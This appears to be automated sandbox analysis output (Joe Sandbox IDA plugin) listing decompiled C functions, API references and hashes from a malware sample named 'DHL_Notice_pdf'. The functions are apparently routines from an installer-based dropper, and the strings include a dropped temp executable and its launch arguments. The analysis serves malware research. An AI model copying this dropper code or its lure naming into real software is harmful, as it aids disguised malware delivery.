                                                            • GlobalFree.KERNEL32 ref: 00402A06
                                                            • GlobalFree.KERNEL32 ref: 00402A19
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                            • String ID:
                                                            • API String ID: 2667972263-0
                                                            • Opcode ID: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                            • Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
                                                            • Opcode Fuzzy Hash: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                            • Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 77%
                                                            			E00404E71(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                            				char _v68;
                                                            				char _v132;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				signed int _t23;
                                                            				signed int _t24;
                                                            				void* _t31;
                                                            				void* _t33;
                                                            				void* _t34;
                                                            				void* _t44;
                                                            				signed int _t46;
                                                            				signed int _t50;
                                                            				signed int _t52;
                                                            				signed int _t53;
                                                            				signed int _t55;
                                                            
                                                            				_t23 = _a16;
                                                            				_t53 = _a12;
                                                            				_t44 = 0xffffffdc;
                                                            				if(_t23 == 0) {
                                                            					_push(0x14);
                                                            					_pop(0);
                                                            					_t24 = _t53;
                                                            					if(_t53 < 0x100000) {
                                                            						_push(0xa);
                                                            						_pop(0);
                                                            						_t44 = 0xffffffdd;
                                                            					}
                                                            					if(_t53 < 0x400) {
                                                            						_t44 = 0xffffffde;
                                                            					}
                                                            					if(_t53 < 0xffff3333) {
                                                            						_t52 = 0x14;
                                                            						asm("cdq");
                                                            						_t24 = 1 / _t52 + _t53;
                                                            					}
                                                            					_t25 = _t24 & 0x00ffffff;
                                                            					_t55 = _t24 >> 0;
                                                            					_t46 = 0xa;
                                                            					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                                                            				} else {
                                                            					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                                                            					_t50 = 0;
                                                            				}
                                                            				_t31 = E004066A5(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                                                            				_t33 = E004066A5(_t44, _t50, _t55,  &_v132, _t44);
                                                            				_t34 = E004066A5(_t44, _t50, 0x423748, 0x423748, _a8);
                                                            				wsprintfW(_t34 + lstrlenW(0x423748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                                                            				return SetDlgItemTextW( *0x429238, _a4, 0x423748);
                                                            			}




















                                                            APIs
                                                            • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                            • wsprintfW.USER32 ref: 00404F1B
                                                            • SetDlgItemTextW.USER32 ref: 00404F2E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: ItemTextlstrlenwsprintf
                                                            • String ID: %u.%u%s%s$H7B
                                                            • API String ID: 3540041739-107966168
                                                            • Opcode ID: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                                            • Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
                                                            • Opcode Fuzzy Hash: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                                            • Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 48%
                                                            			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                                                            				void* _v8;
                                                            				int _v12;
                                                            				short _v536;
                                                            				void* _t27;
                                                            				signed int _t33;
                                                            				intOrPtr* _t35;
                                                            				signed int _t45;
                                                            				signed int _t46;
                                                            				signed int _t47;
                                                            
                                                            				_t46 = _a12;
                                                            				_t47 = _t46 & 0x00000300;
                                                            				_t45 = _t46 & 0x00000001;
                                                            				_t27 = E004064D5(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                                                            				if(_t27 == 0) {
                                                            					if((_a12 & 0x00000002) == 0) {
                                                            						L3:
                                                            						_push(0x105);
                                                            						_push( &_v536);
                                                            						_push(0);
                                                            						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                                                            							__eflags = _t45;
                                                            							if(__eflags != 0) {
                                                            								L10:
                                                            								RegCloseKey(_v8);
                                                            								return 0x3eb;
                                                            							}
                                                            							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
                                                            							__eflags = _t33;
                                                            							if(_t33 != 0) {
                                                            								break;
                                                            							}
                                                            							_push(0x105);
                                                            							_push( &_v536);
                                                            							_push(_t45);
                                                            						}
                                                            						RegCloseKey(_v8);
                                                            						_t35 = E00406A35(3);
                                                            						if(_t35 != 0) {
                                                            							return  *_t35(_a4, _a8, _t47, 0);
                                                            						}
                                                            						return RegDeleteKeyW(_a4, _a8);
                                                            					}
                                                            					_v12 = 0;
                                                            					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                                                            						goto L10;
                                                            					}
                                                            					goto L3;
                                                            				}
                                                            				return _t27;
                                                            			}













                                                            APIs
                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: CloseEnum$DeleteValue
                                                            • String ID:
                                                            • API String ID: 1354259210-0
                                                            • Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                            • Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
                                                            • Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                            • Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 77%
                                                            			E00401D81(void* __ebx, void* __edx) {
                                                            				struct HWND__* _t30;
                                                            				WCHAR* _t38;
                                                            				void* _t48;
                                                            				void* _t53;
                                                            				signed int _t55;
                                                            				signed int _t60;
                                                            				long _t63;
                                                            				void* _t65;
                                                            
                                                            				_t53 = __ebx;
                                                            				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                                                            					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                                                            				} else {
                                                            					E00402D84(2);
                                                            					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                                                            				}
                                                            				_t55 =  *(_t65 - 0x24);
                                                            				 *(_t65 + 8) = _t30;
                                                            				_t60 = _t55 & 0x00000004;
                                                            				 *(_t65 - 0x38) = _t55 & 0x00000003;
                                                            				 *(_t65 - 0x18) = _t55 >> 0x1f;
                                                            				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                                                            				if((_t55 & 0x00010000) == 0) {
                                                            					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                                                            				} else {
                                                            					_t38 = E00402DA6(0x11);
                                                            				}
                                                            				 *(_t65 - 0x44) = _t38;
                                                            				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                                                            				asm("sbb esi, esi");
                                                            				_t63 = LoadImageW( ~_t60 &  *0x42a260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                                                            				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                                                            				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                                                            					DeleteObject(_t48);
                                                            				}
                                                            				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                                                            					_push(_t63);
                                                            					E004065AF();
                                                            				}
                                                            				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t65 - 4));
                                                            				return 0;
                                                            			}












                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                            • String ID:
                                                            • API String ID: 1849352358-0
                                                            • Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                            • Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
                                                            • Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                            • Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 73%
                                                            			E00401E4E(intOrPtr __edx) {
                                                            				void* __edi;
                                                            				int _t9;
                                                            				signed char _t15;
                                                            				struct HFONT__* _t18;
                                                            				intOrPtr _t30;
                                                            				void* _t31;
                                                            				struct HDC__* _t33;
                                                            				void* _t35;
                                                            
                                                            				_t30 = __edx;
                                                            				_t33 = GetDC( *(_t35 - 8));
                                                            				_t9 = E00402D84(2);
                                                            				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                            				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                                                            				ReleaseDC( *(_t35 - 8), _t33);
                                                            				 *0x40ce08 = E00402D84(3);
                                                            				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                                                            				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                            				 *0x40ce0f = 1;
                                                            				 *0x40ce0c = _t15 & 0x00000001;
                                                            				 *0x40ce0d = _t15 & 0x00000002;
                                                            				 *0x40ce0e = _t15 & 0x00000004;
                                                            				E004066A5(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
                                                            				_t18 = CreateFontIndirectW(0x40cdf8);
                                                            				_push(_t18);
                                                            				_push(_t31);
                                                            				E004065AF();
                                                            				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
                                                            				return 0;
                                                            			}












                                                            APIs
                                                            • GetDC.USER32(?), ref: 00401E51
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                            • ReleaseDC.USER32 ref: 00401E84
                                                              • Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                              • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                            • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                            • String ID:
                                                            • API String ID: 2584051700-0
                                                            • Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                            • Instruction ID: b9cc094806d22c325402cb6ccb5f5134c2025175c414775df3ff87de861ccae2
                                                            • Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                            • Instruction Fuzzy Hash: 8401B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 59%
                                                            			E00401C43(intOrPtr __edx) {
                                                            				int _t29;
                                                            				long _t30;
                                                            				signed int _t32;
                                                            				WCHAR* _t35;
                                                            				long _t36;
                                                            				int _t41;
                                                            				signed int _t42;
                                                            				int _t46;
                                                            				int _t56;
                                                            				intOrPtr _t57;
                                                            				struct HWND__* _t63;
                                                            				void* _t64;
                                                            
                                                            				_t57 = __edx;
                                                            				_t29 = E00402D84(3);
                                                            				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                            				 *(_t64 - 0x18) = _t29;
                                                            				_t30 = E00402D84(4);
                                                            				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                            				 *(_t64 + 8) = _t30;
                                                            				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                                                            					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
                                                            				}
                                                            				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                                                            				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                                                            					 *(_t64 + 8) = E00402DA6(0x44);
                                                            				}
                                                            				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                                                            				_push(1);
                                                            				if(__eflags != 0) {
                                                            					_t61 = E00402DA6();
                                                            					_t32 = E00402DA6();
                                                            					asm("sbb ecx, ecx");
                                                            					asm("sbb eax, eax");
                                                            					_t35 =  ~( *_t31) & _t61;
                                                            					__eflags = _t35;
                                                            					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                                            					goto L10;
                                                            				} else {
                                                            					_t63 = E00402D84();
                                                            					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                            					_t41 = E00402D84(2);
                                                            					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                            					_t56 =  *(_t64 - 0x1c) >> 2;
                                                            					if(__eflags == 0) {
                                                            						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                                                            						L10:
                                                            						 *(_t64 - 0x38) = _t36;
                                                            					} else {
                                                            						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                                                            						asm("sbb eax, eax");
                                                            						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                            					}
                                                            				}
                                                            				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
                                                            				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                                                            					_push( *(_t64 - 0x38));
                                                            					E004065AF();
                                                            				}
                                                            				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t64 - 4));
                                                            				return 0;
                                                            			}
















                                                            APIs
                                                            • SendMessageTimeoutW.USER32 ref: 00401CB3
                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Timeout
                                                            • String ID: !
                                                            • API String ID: 1777923405-2657877971
                                                            • Opcode ID: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                            • Instruction ID: e1c20d37316975b9b94706f7b3abd8da4b7b3b5136eece5bd2aa3cbae88a6c19
                                                            • Opcode Fuzzy Hash: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                            • Instruction Fuzzy Hash: 28219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 91%
                                                            			E00406536(void* __ecx, void* __eflags, char _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                                                            				int _v8;
                                                            				long _t21;
                                                            				long _t24;
                                                            				char* _t30;
                                                            
                                                            				asm("sbb eax, eax");
                                                            				_v8 = 0x800;
                                                            				_t5 =  &_a4; // 0x422728
                                                            				_t21 = E004064D5(__eflags,  *_t5, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                                                            				_t30 = _a16;
                                                            				if(_t21 != 0) {
                                                            					L4:
                                                            					 *_t30 =  *_t30 & 0x00000000;
                                                            				} else {
                                                            					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                                                            					_t21 = RegCloseKey(_a20);
                                                            					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                                                            					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                            						goto L4;
                                                            					}
                                                            				}
                                                            				return _t21;
                                                            			}








                                                            APIs
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,0040A230,00000000,('B,00000000,?,?,"C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t,?,?,0040679D,80000002), ref: 0040657C
                                                            • RegCloseKey.ADVAPI32(?,?,0040679D,80000002,Software\Microsoft\Windows\CurrentVersion,"C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t,"C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t,"C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t,00000000,00422728), ref: 00406587
                                                            Strings
                                                            • "C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t, xrefs: 0040653D
                                                            • ('B, xrefs: 0040655B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: CloseQueryValue
                                                            • String ID: "C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t$('B
                                                            • API String ID: 3356406503-2556636245
                                                            • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                            • Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
                                                            • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                            • Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 58%
                                                            			E00405F37(WCHAR* _a4) {
                                                            				WCHAR* _t9;
                                                            
                                                            				_t9 = _a4;
                                                            				_push( &(_t9[lstrlenW(_t9)]));
                                                            				_push(_t9);
                                                            				if( *(CharPrevW()) != 0x5c) {
                                                            					lstrcatW(_t9, 0x40a014);
                                                            				}
                                                            				return _t9;
                                                            			}





                                                            APIs
                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F3D
                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F47
                                                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405F59
                                                            Strings
                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F37
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: CharPrevlstrcatlstrlen
                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                            • API String ID: 2659869361-3916508600
                                                            • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                            • Instruction ID: 9007417a49851ea4d61da9c71e51c63d156abd36d345156a737e00ee84923012
                                                            • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                            • Instruction Fuzzy Hash: 59D05E611019246AC111AB548D04DDB63ACAE85304742046AF601B60A0CB7E196287ED
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 89%
                                                            			E0040563E(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                            				int _t15;
                                                            				long _t16;
                                                            
                                                            				_t15 = _a8;
                                                            				if(_t15 != 0x102) {
                                                            					if(_t15 != 0x200) {
                                                            						_t16 = _a16;
                                                            						L7:
                                                            						if(_t15 == 0x419 &&  *0x423734 != _t16) {
                                                            							_push(_t16);
                                                            							_push(6);
                                                            							 *0x423734 = _t16;
                                                            							E00404FFF();
                                                            						}
                                                            						L11:
                                                            						return CallWindowProcW( *0x42373c, _a4, _t15, _a12, _t16);
                                                            					}
                                                            					if(IsWindowVisible(_a4) == 0) {
                                                            						L10:
                                                            						_t16 = _a16;
                                                            						goto L11;
                                                            					}
                                                            					_t16 = E00404F7F(_a4, 1);
                                                            					_t15 = 0x419;
                                                            					goto L7;
                                                            				}
                                                            				if(_a12 != 0x20) {
                                                            					goto L10;
                                                            				}
                                                            				E00404610(0x413);
                                                            				return 0;
                                                            			}






                                                            APIs
                                                            • IsWindowVisible.USER32(?), ref: 0040566D
                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 004056BE
                                                              • Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: Window$CallMessageProcSendVisible
                                                            • String ID:
                                                            • API String ID: 3748168415-3916222277
                                                            • Opcode ID: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                            • Instruction ID: 537e1cae7e4c88fb21f4f8cfd237bdd46b0b38e99f2a5e053ca6ba0093d9a5c8
                                                            • Opcode Fuzzy Hash: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                            • Instruction Fuzzy Hash: 4401B171200608AFEF205F11DD84A6B3A35EB84361F904837FA08752E0D77F8D929E6D
